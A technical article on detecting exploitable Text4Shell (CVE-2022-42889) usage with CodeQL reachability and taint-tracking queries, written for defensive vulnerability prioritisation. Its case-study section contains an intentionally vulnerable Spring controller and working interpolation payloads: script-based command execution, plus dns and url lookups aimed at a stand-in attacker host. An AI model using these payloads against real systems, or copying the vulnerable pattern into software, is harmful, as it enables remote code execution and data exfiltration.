Beyond Traditional SCA: Detecting Exploitable Vulnerabilities Using CodeQL Reachability Analysis (Text4Shell Case Study)

Q: 1. Is a “Negative Result” a guarantee of safety?

A negative result (no path found) is a “valuable negative” because it proves that no static path exists based on the current query. However, it is not an absolute guarantee of safety. Dynamic execution or missing source code for dependencies can hide paths. Reachability analysis should be used to prioritize known risks, not as a reason to ignore foundational security hygiene like patching.

Q: 2. How does CodeQL handle complex sanitization?

CodeQL is excellent at tracking taint, but it requires the researcher to define what acts as a “sanitizer.” If your application uses custom or complex sanitization logic that hasn’t been modeled in the query, CodeQL may continue to report a path as exploitable even though the data has been neutralized.

Q: 3. Does this replace traditional SCA?

No, the two approaches are complementary. Traditional SCA provides the essential, broad inventory of potential risks, while CodeQL provides the deep, surgical analysis needed to confirm exploitability and prioritize remediation.

Q: 4. What is reachability analysis in vulnerability detection?

Reachability analysis determines whether vulnerable code can actually be executed by tracing application control flow and data flow from attacker-controlled sources to vulnerable sinks.

Q: 5. How does CodeQL reduce false positives in SCA?

CodeQL analyzes how code behaves, not just which libraries are present. It only reports vulnerabilities when real data flow paths exist.

Q: 6. Is Text4Shell always exploitable if the library is present?

No. Text4Shell is only exploitable when untrusted input reaches StringSubstitutor.replace() with vulnerable interpolators enabled.

Q: 7. Can CodeQL prove a vulnerability is not exploitable?

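To a degree. If the query finds no path from any modeled source to the vulnerable sink, CodeQL provides strong static evidence that the vulnerability cannot be triggered in the analyzed code. As noted in question 1, this is not an absolute guarantee.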

Q: 8. Why is CodeQL considered semantic SCA?

Because it evaluates dependency usage, control flow, and data flow rather than relying on version matching alone.

Overview

Software Composition Analysis tools commonly flag vulnerabilities based on dependency versions alone. This approach produces a high volume of false positives because many vulnerable functions are never executed or never receive untrusted input.

Reachability analysis changes the question from “Is the vulnerable library present?” to “Can attacker-controlled data reach the vulnerable code?”

CodeQL enables this analysis by converting application source code into a semantic database and performing taint tracking across application and dependency boundaries. This allows security teams to confirm exploitability with technical proof rather than assumptions.

Using Text4Shell (CVE-2022-42889) as a real-world example, this article demonstrates how CodeQL data flow analysis identifies whether the vulnerable StringSubstitutor.replace() method is actually reachable and exploitable within an application.

Key Takeaways

Traditional SCA detects vulnerable libraries, not exploitable vulnerabilities. Dependency presence alone does not indicate real-world risk.
CodeQL reachability analysis demonstrates exploitability using data flow paths. Vulnerabilities are only actionable when untrusted input reaches a vulnerable sink.
Negative results are valuable security outcomes. If CodeQL finds no reachable execution path, the vulnerability can usually be deprioritized, though patching should still follow.

I. The Foundational Role of SCA and The Paradigm Shift to Deep Reachability Analysis

Modern software applications are mosaics, built upon layers of open-source packages that constitute an estimated 70–90% of the total codebase [1]. This reliance on third-party dependencies has made Software Composition Analysis (SCA) an indispensable security practice. However, traditional SCA tools, which rely on manifest file scanning (e.g., pom.xml, package.json) against public vulnerability databases, are facing a crisis of relevance.

The core issue is noise. A traditional SCA tool reports a vulnerability whenever a project uses a vulnerable version of a library. This approach often leads to a deluge of false positives: alerts for vulnerabilities that are technically present but functionally impossible to exploit in the specific application context.

This is where Reachability Analysis becomes the paradigm shift. Instead of merely asking, "Is the vulnerable library present?", we ask the harder, more meaningful question: "Can attacker-controlled data actually reach and execute the vulnerable code?" [2].

CodeQL is the engine that powers this advanced analysis. By transforming source code into a relational database, CodeQL allows security engineers to write precise queries that model the flow of data through the application and its dependencies. This process enables Exploitable Vulnerability Analysis, allowing organizations to cut through the noise and focus their remediation efforts on the vulnerabilities that truly matter [3].

This article uses the Text4Shell vulnerability (CVE-2022-42889) as a case study to demonstrate how CodeQL's data flow reachability analysis provides the technical proof needed to confirm exploitability.

II. Text4Shell: A Case Study in Vulnerable Sinks (CVE-2022-42889)

The Text4Shell vulnerability, found in Apache Commons Text (package org.apache.commons.text) versions 1.5 through 1.9, is a classic example of a dangerous feature enabled by default. The StringSubstitutor class is designed to replace variables within a string using dynamic lookups. In the vulnerable versions, the default interpolators included lookups for script, dns, and url [4].

The Exploit Chain: Source to Sink

The vulnerability is triggered when untrusted input is passed to the StringSubstitutor.replace() method. The example and the internal call chain below show the mechanism.

Example Vulnerable Code Flow

Consider the following Spring Boot controller code, which is a classic example of the vulnerable pattern:

import org.apache.commons.text.StringSubstitutor; 
import org.springframework.web.bind.annotation.*;  
@RestController 
@RequestMapping("text4shell") 
public class Text4ShellController {  
    @RequestMapping(value = "/attack", method = RequestMethod.GET) 
    @ResponseBody 
    public String attack(@RequestParam(defaultValue="5up3r541y4n") String search) { 
        StringSubstitutor interpolator = StringSubstitutor.createInterpolator(); 
        try{ 
            String pwn = interpolator.replace(search); // VULNERABLE SINK 
        } catch(Exception e) { 
            System.out.println(e); 
        } 
        return "Search results for: " + search; 
    } 
}


The data flow in this example is a perfect illustration of the Source-to-Sink path CodeQL is designed to detect:

Source (User Input): The method parameter search is annotated with @RequestParam. This tells CodeQL's standard data flow library that the value of search is user-controlled and therefore tainted.
Taint Flow: The tainted variable search is passed directly as the argument to the interpolator.replace() method.
Sink (Vulnerable Method): The interpolator.replace(search) call is the Sink. This method, when called on a StringSubstitutor object created with createInterpolator() in a vulnerable version, initiates the dangerous string substitution.
Exploitation: An attacker sends a request like /text4shell/attack?search=${script:javascript:java.lang.Runtime.getRuntime().exec('touch /tmp/foo')}, causing the vulnerable lookup to execute the payload.

This concrete example provides the proof of reachability that CodeQL seeks to confirm.

The generalized internal call chain is as follows. The replace() method (the Sink) calls substitute(), which scans the input string for expressions like ${prefix:name}. The InterpolatorStringLookup then dynamically dispatches the request to the lookup handler registered for that prefix.

Vulnerable Lookup	Impact	Technical Consequence	Example Payload
script	Remote Code Execution (RCE)	Allows execution of arbitrary code through a JVM script engine named in the payload. Note: on Java 15 or later the JDK no longer bundles the Nashorn JavaScript engine, so the javascript payload fails unless another script engine is on the classpath; the other vectors remain. [4]	${script:javascript:java.lang.Runtime.getRuntime().exec("touch /tmp/pwned")}
dns	Information Leakage	Triggers DNS resolution for attacker-controlled domains, useful for exfiltrating data or probing internal networks.	${dns:address|evil-attacker.com}
url	Server-Side Request Forgery (SSRF)	Forces the application to make requests to internal or external resources based on the payload.	${url:UTF-8:http://evil-attacker.com/payload.txt}
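
The dispatch step described above can be illustrated with a toy interpolator in plain Java. This is only a sketch of the general pattern (scan for ${prefix:name}, then hand name to whichever handler is registered for prefix); it is not the Commons Text implementation, and the class ToyInterpolator and the prefixes upper and danger are hypothetical names chosen for illustration.

```java
import java.util.LinkedHashMap;
import java.util.Map;
import java.util.function.Function;
import java.util.regex.Matcher;
import java.util.regex.Pattern;

// Toy model of prefix-dispatched interpolation. NOT the Commons Text code.
class ToyInterpolator {
    // Matches ${prefix:name}; group 1 is the prefix, group 2 is the name.
    private static final Pattern EXPR = Pattern.compile("\\$\\{([a-z]+):([^}]*)\\}");
    private final Map<String, Function<String, String>> lookups = new LinkedHashMap<>();

    ToyInterpolator register(String prefix, Function<String, String> handler) {
        lookups.put(prefix, handler);
        return this;
    }

    // The "sink": whoever controls the input chooses which handler runs.
    String replace(String input) {
        Matcher m = EXPR.matcher(input);
        StringBuffer out = new StringBuffer();
        while (m.find()) {
            Function<String, String> handler = lookups.get(m.group(1));
            // Unknown prefixes are left untouched in the output.
            String value = handler == null ? m.group(0) : handler.apply(m.group(2));
            m.appendReplacement(out, Matcher.quoteReplacement(value));
        }
        m.appendTail(out);
        return out.toString();
    }

    public static void main(String[] args) {
        ToyInterpolator interpolator = new ToyInterpolator()
            .register("upper", String::toUpperCase)
            // Stand-in for a dangerous lookup; it only reports what it was asked to do.
            .register("danger", name -> "<side effect requested: " + name + ">");
        System.out.println(interpolator.replace("hello ${upper:world}"));
        System.out.println(interpolator.replace("q=${danger:touch /tmp/foo}"));
    }
}
```

The point of the sketch is that the handler is selected by the input string itself, which is why a default configuration that registers powerful handlers turns replace() into a sink.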


The Foundational Role of Traditional SCA

Traditional SCA provides the critical first step by confirming the presence of a vulnerable version: "commons-text 1.8 is present → vulnerable." To move from this comprehensive inventory finding to an actionable security finding, a deeper analysis is required. The vulnerability is only exploitable if:

The vulnerable method, StringSubstitutor.replace(...), is reachable by the application's control flow.
Attacker-controlled input flows into the argument of that method.
The vulnerable interpolators (script, dns, url) are not explicitly disabled (which they are not by default in the vulnerable versions).

This makes CVE-2022-42889 an ideal case study for CodeQL-based reachability analysis, as it requires proving all three conditions simultaneously.

Text4Shell vs. Log4Shell: A Crucial Distinction

This issue is fundamentally different from the infamous Log4Shell (CVE-2021-44228). In Log4Shell, string interpolation was possible from the log message body, which commonly contains untrusted input. In the Apache Commons Text issue, the relevant method is explicitly intended and clearly documented to perform string interpolation. Consequently, it is much less likely that applications would inadvertently pass in untrusted input without proper validation [6]. This distinction further underscores the need for precise data flow analysis: we must prove that a developer did make the mistake of passing untrusted data to this intended, but dangerous, function.

III. The Nuance: Reachable ≠ Exploitable

A key concept in advanced SCA is the distinction between a vulnerable function being Reachable and the vulnerability being fully Exploitable.

Reachable: The application's control flow can execute the vulnerable method (StringSubstitutor.replace()).
Exploitable: Untrusted data can flow from a user-controlled Source to the vulnerable Sink without being sanitized or guarded by a condition that prevents the exploit.

CodeQL’s strength lies in its ability to model the flow of tainted data (attacker-controlled input). It answers the question: Is there a path from user input to the vulnerable function's argument?
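
To make the "path from user input to the sink argument" question concrete, here is a minimal Java sketch of taint propagation over a hand-written data flow graph. It is a toy model, not how CodeQL is implemented: the class ToyTaintTracker, the node names, and the idea of passing sanitizers as a set of barrier nodes are all assumptions made for illustration. It requires Java 9 or later for List.of, Map.of, and Set.of.

```java
import java.util.ArrayDeque;
import java.util.Deque;
import java.util.HashMap;
import java.util.LinkedList;
import java.util.List;
import java.util.Map;
import java.util.Set;

// Toy taint tracker: breadth-first search from sources to a sink,
// refusing to step onto any node modeled as a barrier (sanitizer).
class ToyTaintTracker {
    static List<String> findPath(Map<String, List<String>> flows, Set<String> sources,
                                 Set<String> barriers, String sink) {
        Map<String, String> parent = new HashMap<>(); // also serves as the visited set
        Deque<String> worklist = new ArrayDeque<>();
        for (String source : sources) {
            parent.put(source, null);
            worklist.add(source);
        }
        while (!worklist.isEmpty()) {
            String node = worklist.poll();
            if (node.equals(sink)) {
                // Walk the parent links back to the source to rebuild the path.
                LinkedList<String> path = new LinkedList<>();
                for (String n = node; n != null; n = parent.get(n)) {
                    path.addFirst(n);
                }
                return path;
            }
            for (String next : flows.getOrDefault(node, List.of())) {
                if (barriers.contains(next) || parent.containsKey(next)) continue;
                parent.put(next, node);
                worklist.add(next);
            }
        }
        return List.of(); // empty list: no tainted path found
    }

    public static void main(String[] args) {
        Map<String, List<String>> flows = Map.of(
            "request.search", List.of("validated"),
            "validated", List.of("replace(arg0)"));
        // Validation step not modeled as a sanitizer: a path is reported.
        System.out.println(findPath(flows, Set.of("request.search"), Set.of(), "replace(arg0)"));
        // Same graph with the validation step modeled as a barrier: no path.
        System.out.println(findPath(flows, Set.of("request.search"), Set.of("validated"), "replace(arg0)"));
    }
}
```

The two calls differ only in whether the validation step is modeled as a barrier, which shows why the result depends on how completely sanitizers are described to the analysis.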

IV. Writing the CodeQL Logic: Proving Taint Reachability

CodeQL's query for Text4Shell is a sophisticated implementation of a Taint Tracking analysis, requiring three components: the Sink, the Source, and the Version Check.

Step 1. Defining the Sink and the Vulnerable Version

The Sink is defined by the methods that accept the string to be substituted. Two pieces of query logic do the work: a class that defines the Sink method call, and a predicate that ensures results are only reported when the dependency version is vulnerable.

The CommonTextsSink class uses hasQualifiedName and getName to precisely target the vulnerable methods, and getArgument(0) to ensure we are tracking the data flowing into the string argument.

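// Imports used by the snippets in this section (they belong to one .ql file)
import java
import semmle.code.java.dataflow.DataFlow
import semmle.code.java.dataflow.TaintTracking
import semmle.code.java.dataflow.FlowSources
import semmle.code.xml.MavenPom

/**
 * Sink: the first argument of Apache Commons Text
 * StringSubstitutor.replace(...) or StringSubstitutor.replaceIn(...)
 */
class CommonTextsSink extends DataFlow::Node {
  CommonTextsSink() {
    exists(MethodCall mc |
      mc.getMethod().getDeclaringType().hasQualifiedName("org.apache.commons.text", "StringSubstitutor") and
      mc.getMethod().hasName(["replace", "replaceIn"]) and
      this.asExpr() = mc.getArgument(0) // The argument is the string that gets interpolated
    )
  }
}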

To ensure high precision, the query integrates a dependency check. This predicate queries the project's dependency graph (e.g., Maven POM files) to confirm the library version is within the vulnerable range: >=1.5 and <1.10.0.

predicate hasVulnerableCommonsTextVersion() {
  exists(Dependency d, string v |
    d.getGroup().getValue() = "org.apache.commons" and
    d.getArtifact().getValue() = "commons-text" and
    v = d.getVersion().getValue() and
    // affected versions: >=1.5, <1.10.0
    // (matches literal version strings only; a version supplied through a
    // property placeholder may need additional handling)
    v.regexpMatch("1\\.[5-9](\\.\\d+)*")
  )
}
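
The range check is easy to get wrong when versions are compared as text, because "1.10.0" sorts before "1.5" lexically. The following Java sketch, independent of CodeQL, shows the same >=1.5, <1.10.0 test done numerically. The class name VersionRange is hypothetical, and the sketch assumes plain dotted numeric versions with at most three components (no qualifiers such as -SNAPSHOT).

```java
// Numeric version comparison for the affected range >=1.5, <1.10.0.
class VersionRange {
    // Parses "1.9" or "1.10.0" into {major, minor, patch}; missing parts are 0.
    static int[] parse(String version) {
        String[] parts = version.split("\\.");
        int[] numbers = new int[3];
        for (int i = 0; i < numbers.length && i < parts.length; i++) {
            numbers[i] = Integer.parseInt(parts[i]);
        }
        return numbers;
    }

    static int compare(String a, String b) {
        int[] x = parse(a);
        int[] y = parse(b);
        for (int i = 0; i < 3; i++) {
            if (x[i] != y[i]) {
                return Integer.compare(x[i], y[i]);
            }
        }
        return 0;
    }

    static boolean isAffected(String version) {
        return compare(version, "1.5") >= 0 && compare(version, "1.10.0") < 0;
    }

    public static void main(String[] args) {
        for (String v : new String[] {"1.4", "1.5", "1.9", "1.10.0"}) {
            System.out.println(v + " affected: " + isAffected(v));
        }
        // Lexical comparison gets the order wrong: this prints a negative number.
        System.out.println("1.10.0".compareTo("1.5"));
    }
}
```

With these inputs, 1.5 and 1.9 are reported as affected, while 1.4 and 1.10.0 are not.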


Step 2. Configuring the Taint Flow

The analysis is configured using the TaintTracking library. The CommonsTextConfig module connects the Source (untrusted input) and the Sink (the vulnerable method call, conditional on the version check).

/**
 * Taint-tracking configuration
 */
module CommonsTextConfig implements DataFlow::ConfigSig {
  // Source: any input covered by the active threat models (remote input such as
  // HTTP requests by default; local input such as file reads only when enabled)
  predicate isSource(DataFlow::Node source) { source instanceof ActiveThreatModelSource }

  // Sink: the vulnerable method call, but only if the version is vulnerable
  predicate isSink(DataFlow::Node sink) {
    hasVulnerableCommonsTextVersion() and sink instanceof CommonTextsSink
  }
}

module CommonsTextsFlow = TaintTracking::Global<CommonsTextConfig>;

Step 3. Executing the Query

The final query uses the flowPath predicate to execute the analysis and generate a path-based result.

// Path results also need "@kind path-problem" in the query metadata
import CommonsTextsFlow::PathGraph

from CommonsTextsFlow::PathNode source, CommonsTextsFlow::PathNode sink
where CommonsTextsFlow::flowPath(source, sink)
select sink.getNode(), source, sink,
  "User-controlled input flows into StringSubstitutor.replace(), which is vulnerable in this version."

V. The Value of a Negative Result

A vulnerable dependency is not exploitable unless the application can actually execute the vulnerable method. If StringSubstitutor.replace() is never reachable, CVE-2022-42889 cannot be triggered. This is where CodeQL provides its most powerful insight: the valuable negative result. With CodeQL, we can show: "There is no execution path from any modeled user input to StringSubstitutor.replace() in this codebase."

This is strong technical evidence that the vulnerability cannot be triggered in the analyzed code, allowing the team to de-prioritize the issue with confidence. It is bounded by what the database and the query cover, so dynamic execution or dependencies without source code can still hide paths. CodeQL’s ability to show the absence of an execution path for vulnerable code that is never called, guarded by unreachable branches, or used only with constants significantly reduces noise in large codebases.
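
The "never called" case can be pictured as a reachability search over a call graph. The Java sketch below is a toy model under stated assumptions: the call graph is written by hand, and the class CallGraphReachability and all method names in it are hypothetical. A real analysis derives the graph from the code. It requires Java 9 or later.

```java
import java.util.ArrayDeque;
import java.util.Deque;
import java.util.HashSet;
import java.util.List;
import java.util.Map;
import java.util.Set;

// Toy control-flow reachability: can `target` be called, directly or
// transitively, starting from `entry`?
class CallGraphReachability {
    static boolean isReachable(Map<String, List<String>> callGraph, String entry, String target) {
        Deque<String> worklist = new ArrayDeque<>();
        Set<String> visited = new HashSet<>();
        worklist.add(entry);
        while (!worklist.isEmpty()) {
            String method = worklist.poll();
            if (method.equals(target)) {
                return true;
            }
            if (!visited.add(method)) {
                continue; // already explored
            }
            worklist.addAll(callGraph.getOrDefault(method, List.of()));
        }
        return false; // the negative result: no call chain exists in this graph
    }

    public static void main(String[] args) {
        Map<String, List<String>> callGraph = Map.of(
            "SearchController.search", List.of("SearchService.find"),
            "SearchService.find", List.of("SearchRepository.query"),
            // Present in the codebase, but nothing reachable from the entry point calls it.
            "ReportJob.render", List.of("StringSubstitutor.replace"));
        System.out.println(isReachable(callGraph, "SearchController.search", "StringSubstitutor.replace"));
        System.out.println(isReachable(callGraph, "ReportJob.render", "StringSubstitutor.replace"));
    }
}
```

The first call returns false and the second returns true. The negative answer holds only for the graph that was supplied, which is the same caveat that applies to any static negative result.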

VI. Conclusion: Precision and Complementary Analysis

The CodeQL approach extends SCA from a foundational inventory check into a precise, security-critical analysis. By focusing on taint flow and reachability, researchers can confidently identify and prioritize the vulnerabilities that pose a real threat. The two approaches are complementary: traditional SCA supplies the broad inventory of potential risks, and CodeQL supplies the deep, targeted analysis that confirms exploitability and guides remediation.
